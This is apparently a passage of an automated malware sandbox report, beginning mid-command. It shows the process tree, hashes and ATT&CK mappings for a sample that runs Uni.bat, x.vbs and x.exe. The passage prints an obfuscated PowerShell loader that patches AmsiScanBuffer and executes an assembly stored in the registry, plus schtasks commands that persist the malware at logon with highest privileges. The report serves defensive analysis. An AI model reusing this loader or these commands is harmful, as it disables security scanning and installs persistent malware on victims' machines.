har](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $aZdvvLpqsTA.CreateType();}$JvxrNJAJRZnQM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'te'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+'f'+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$xudQDJDYjrZxeq=$JvxrNJAJRZnQM.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+'r'+'o'+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CHCpBIUaszmJjfnDywq=JkArrNdATHnm @([String])([IntPtr]);$fLLniuopiGegqoqJpsdjeB=JkArrNdATHnm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gTPaFVrrjLn=$JvxrNJAJRZnQM.GetMethod('Ge'+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$QyekChtyeLjspx=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$gTPaFVrrjLn,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+'ar'+'y'+''+'A'+'')));$oCTFjBRINtEFpvolL=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$gTPaFVrrjLn,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$RFghayu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyekChtyeLjspx,$CHCpBIUaszmJjfnDywq).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$YpWruKeTqGVrgyFLD=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$RFghayu,[Object]('A'+[Char](109)+'siSc'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'ff'+'e'+''+'r'+'')));$BLmPAGKXoY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oCTFjBRINtEFpvolL,$fLLniuopiGegqoqJpsdjeB).Invoke($YpWruKeTqGVrgyFLD,[uint32]8,4,[ref]$BLmPAGKXoY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YpWruKeTqGVrgyFLD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oCTFjBRINtEFpvolL,$fLLniuopiGegqoqJpsdjeB).Invoke($YpWruKeTqGVrgyFLD,[uint32]8,0x20,[ref]$BLmPAGKXoY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3064

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2476

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\system32\findstr.exe
findstr /e "'v" "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
3⤵
PID:2384

C:\Windows\system32\cscript.exe
cscript //nologo C:\Users\Admin\AppData\Local\Temp\x.vbs
3⤵
PID:1748

C:\Users\Admin\AppData\Local\Temp\x.exe
C:\Users\Admin\AppData\Local\Temp\x.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\x.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:5100

C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4828

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
5⤵
- Executes dropped EXE
PID:5024

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:708

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77x.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\x.exe'" /sc onlogon /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3448

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4380

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2260

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3916

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:416

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:660

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:796

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\x
Filesize
4KB

MD5
e4870e835feab58e50c0a2a05fdb733b

SHA1
d81f625b7dabc09e9fccd515dcd89c6c1da46ee6

SHA256
0ca17ef0a09d95e6751b571a80cc965de79bda8e94c35bdee537c897951125b1

SHA512
488234c5c66c3c18376ceff9493c2f12302dafce8b02cd7124bce7682031dad95712a8e652efe75629c101e3efa7347245892a8e89c735816c637ff7ecfb4cd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\x
Filesize
560KB

MD5
7a0b5e602d8f8674134628255c8955b3

SHA1
eb1171c299ac9dd2199d12d7084a9a68a8ab33ad

SHA256
2629b725c93d70dde683bd0bf89e749d4e7c469096a3f0d89fcf09ea871c0021

SHA512
b059685576ed14753eee0264a56f8d852036db659ec0aeb91527331ef967f349a8cd57c6f16302acdf6a900718e2588651aed051ed67e4a4f73bf4c0b00f4f41

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.exe
Filesize
409KB

MD5
7417c8c73e614f293152575f46134216

SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.vbs
Filesize
380B

MD5
ec9a2fb69a379d913a4e0a953cd3b97c

SHA1
a0303ed9f787c042071a1286bba43a5bbdd0679e

SHA256
cf8268d158bb819ef158ff6ccbed64d5e379148a0adb1f73a082a01d56d0286b

SHA512
fef8e24a680991046bd7dacd6079c7e48c3031fe46caae722ea93797ee16c052073ba97959e992ea71ac7ab72fbcedaa5cf4a410657aac4c10ad24de6935e9d6

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_cauzuuhp.air.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/436-8085-0x00007FFB345F0000-0x00007FFB34600000-memory.dmp

Filesize
64KB

Download
memory/436-8084-0x0000019C9CD30000-0x0000019C9CD5B000-memory.dmp

Filesize
172KB

Download
memory/436-8078-0x0000019C9CD30000-0x0000019C9CD5B000-memory.dmp

Filesize
172KB

Download
memory/640-8051-0x000001D503C50000-0x000001D503C7B000-memory.dmp

Filesize
172KB

Download
memory/640-8044-0x000001D503C50000-0x000001D503C7B000-memory.dmp

Filesize
172KB

Download
memory/640-8052-0x00007FFB345F0000-0x00007FFB34600000-memory.dmp

Filesize
64KB

Download
memory/640-8045-0x000001D503C50000-0x000001D503C7B000-memory.dmp

Filesize
172KB

Download
memory/640-8043-0x000001D5039D0000-0x000001D5039F5000-memory.dmp

Filesize
148KB

Download
memory/696-8056-0x0000028FE1E00000-0x0000028FE1E2B000-memory.dmp

Filesize
172KB

Download
memory/696-8063-0x00007FFB345F0000-0x00007FFB34600000-memory.dmp

Filesize
64KB

Download
memory/696-8062-0x0000028FE1E00000-0x0000028FE1E2B000-memory.dmp

Filesize
172KB

Download
memory/748-8089-0x00000203A9E90000-0x00000203A9EBB000-memory.dmp

Filesize
172KB

Download
memory/988-8074-0x00007FFB345F0000-0x00007FFB34600000-memory.dmp

Filesize
64KB

Download
memory/988-8073-0x0000027A03180000-0x0000027A031AB000-memory.dmp

Filesize
172KB

Download
memory/988-8067-0x0000027A03180000-0x0000027A031AB000-memory.dmp

Filesize
172KB

Download
memory/1700-8018-0x00000000065C0000-0x00000000065CA000-memory.dmp

Filesize
40KB

Download
memory/1700-7998-0x0000000075170000-0x0000000075921000-memory.dmp

Filesize
7.7MB

Download
memory/2208-8031-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2208-8037-0x00007FFB72A80000-0x00007FFB72B3D000-memory.dmp

Filesize
756KB

Download
memory/2208-8036-0x00007FFB74560000-0x00007FFB74769000-memory.dmp

Filesize
2.0MB

Download
memory/2208-8035-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2208-8040-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2208-8032-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2208-8033-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2208-8030-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3592-8029-0x00007FFB72A80000-0x00007FFB72B3D000-memory.dmp

Filesize
756KB

Download
memory/3592-8028-0x00007FFB74560000-0x00007FFB74769000-memory.dmp

Filesize
2.0MB

Download
memory/3592-8027-0x0000029A6BE80000-0x0000029A6BEAA000-memory.dmp

Filesize
168KB

Download
memory/3592-8013-0x0000029A6B9C0000-0x0000029A6B9E2000-memory.dmp

Filesize
136KB

Download
memory/4824-8004-0x0000000075170000-0x0000000075921000-memory.dmp

Filesize
7.7MB

Download
memory/4824-7992-0x0000000005E70000-0x0000000005EAC000-memory.dmp

Filesize
240KB

Download
memory/4824-7991-0x0000000005920000-0x0000000005932000-memory.dmp

Filesize
72KB

Download
memory/4824-7990-0x0000000004C10000-0x0000000004C76000-memory.dmp

Filesize
408KB

Download
memory/4824-7989-0x0000000075170000-0x0000000075921000-memory.dmp

Filesize
7.7MB

Download
memory/4824-7988-0x0000000004CC0000-0x0000000004D52000-memory.dmp

Filesize
584KB

Download
memory/4824-7987-0x0000000005270000-0x0000000005816000-memory.dmp

Filesize
5.6MB

Download
memory/4824-7986-0x00000000000D0000-0x000000000013C000-memory.dmp

Filesize
432KB

Download
memory/4824-7985-0x000000007517E000-0x000000007517F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads